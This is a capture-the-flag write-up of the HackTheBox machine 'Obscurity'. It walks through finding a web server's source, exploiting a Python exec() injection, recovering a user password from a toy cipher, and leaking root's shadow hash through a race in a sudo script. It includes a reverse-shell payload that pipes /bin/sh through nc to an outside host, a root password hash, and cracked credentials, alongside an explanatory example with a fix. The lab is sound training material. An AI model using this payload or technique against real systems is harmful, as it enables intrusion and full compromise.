Summary
Obscurity, a Linux box created by HackTheBox user clubby789, was a medium difficulty box overall. The initial foothold was finding the source code of the web server and analysing it to find an RCE, which gets us a low-privilege shell. In the user's home directory there is a Python encryption script we can use to recover the user's password. As that user we can run a Python script meant to replace SSH, which we can use to read root's password hash, and cracking that hash gets us root.
Initial Scan
nmap
    # Nmap 7.80 scan initiated Sat Nov 30 15:01:37 2019 as: nmap -sC -sV -oN nmap/obscurity 10.10.10.168
If we navigate to the website on port 8080 we see a web page for a company with a rather interesting take on security. Reading on, at the bottom of the page we see
    Message to server devs: the current source code for the webserver is in 'SuperSecureServer.py' in the secret development directory.
So we can run wfuzz to find the code.
    wfuzz -c -w /usr/share/wordlists/dirb/small.txt 10.10.10.168:8080/FUZZ/SuperSecureServer.py
which reveals that the code is in the develop directory.
Getting the code and analysing it
    info = "output = 'Document: {}'" # Keep the output for later debug
Since we control the path that gets substituted into this string before it reaches exec(), we can use it to run code we want. So we can execute a payload with
    10.10.10.168:8080/'; os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9000 >/tmp/f");a='a
which gives us a shell as www-data.
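To make the root cause concrete, here is a constructed example (not the page's or the box's own code) of the same pattern: a request path pasted into a Python statement and handed to exec(), next to the exec-free form and a parser-based check that tells a plain path from one that broke out of the string literal. The INFO string is copied from the snippet above; everything else is assumed.

```python
import ast

# Same shape as the SuperSecureServer.py line quoted above; the rest of this
# file is a constructed illustration, not the server's code.
INFO = "output = 'Document: {}'"  # Keep the output for later debug

def render_vulnerable(path: str) -> dict:
    """Builds the statement with str.format() and exec()s it (the bug).
    Returns every name the statement defined, so a caller can see whether
    anything other than 'output' was created by the request."""
    scope = {}
    exec(INFO.format(path), scope)
    scope.pop("__builtins__", None)  # inserted by exec(), not by the statement
    return scope

def render_fixed(path: str) -> str:
    """Same result with no exec(): plain string formatting cannot run code,
    whatever characters the path contains."""
    return "Document: {}".format(path)

def statements_in(path: str) -> int:
    """Defender-side check: parse the statement the vulnerable server would
    run and count its top-level statements. More than one means the path
    closed the string literal and appended its own code; -1 means it does
    not even parse, which is just as suspicious for a document path."""
    try:
        return len(ast.parse(INFO.format(path)).body)
    except SyntaxError:
        return -1

if __name__ == "__main__":
    benign = "index.html"
    # A single quote ends the literal; what follows is executed as Python.
    # The marker is harmless here; on the server it would be the request
    # sender's code, running as the web server user.
    injected = "'; marker = 42; output = 'Document: "
    print(render_vulnerable(benign))    # {'output': 'Document: index.html'}
    print(render_vulnerable(injected))  # {'output': 'Document: ', 'marker': 42}
    print(render_fixed(injected))       # the quote is just another character
    print(statements_in(benign), statements_in(injected))  # 1 3
```

Note that an ordinary apostrophe in a filename also makes the statement unparsable, so the vulnerable server was fragile on legitimate input as well as exploitable.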
Checking robert's home directory we find SuperSecureCrypt.py, an encrypted file containing robert's password reminder, and a test pair consisting of an encrypted file and its plaintext. Using the plaintext and the sample encrypted file we recover the key:
    utfenc ="¦ÚÈêÚÞØÛÝÝ×ÐÊß ÞÊÚÉæßÝËÚÛÚêÙÉëéÑÒÝÍÐ êÆáÙÞãÒÑÐáÙ¦ÕæØãÊÎÍßÚêÆÝáäèÎÍÚÎëÑÓäáÛÌ×v"
which reveals the key as alexandrovich. Decrypting passwordreminder.txt with it we get the password SecThruOBsFTW, which gives us user and lets us read user.txt.
Privilege Escalation
Now that we are user we see that there is a BetterSSH.py in /home/robert/BetterSSH/. Checking sudo -l shows
    User robert may run the following commands on obscure:
For some reason the script copies the contents of the shadow file to a randomly named file in /tmp/SSH. So open two terminal sessions and run
    while true; do cat /tmp/SSH/*; done
in one session, and in the other run sudo /home/robert/BetterSSH/BetterSSH.py and enter the username test and the password test, which gives an invalid password error. But in the first terminal we see the contents of the shadow file, so we can grab root's password hash:
    $6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
We can crack the hash using John the Ripper and rockyou.txt, which gives us the password mercedes. So we can ssh to the box as root:mercedes and grab root.txt:
    root@obscure:~# id;hostname;cut -c 1-15 /root/root.txt
and we have pwned Obscurity 💃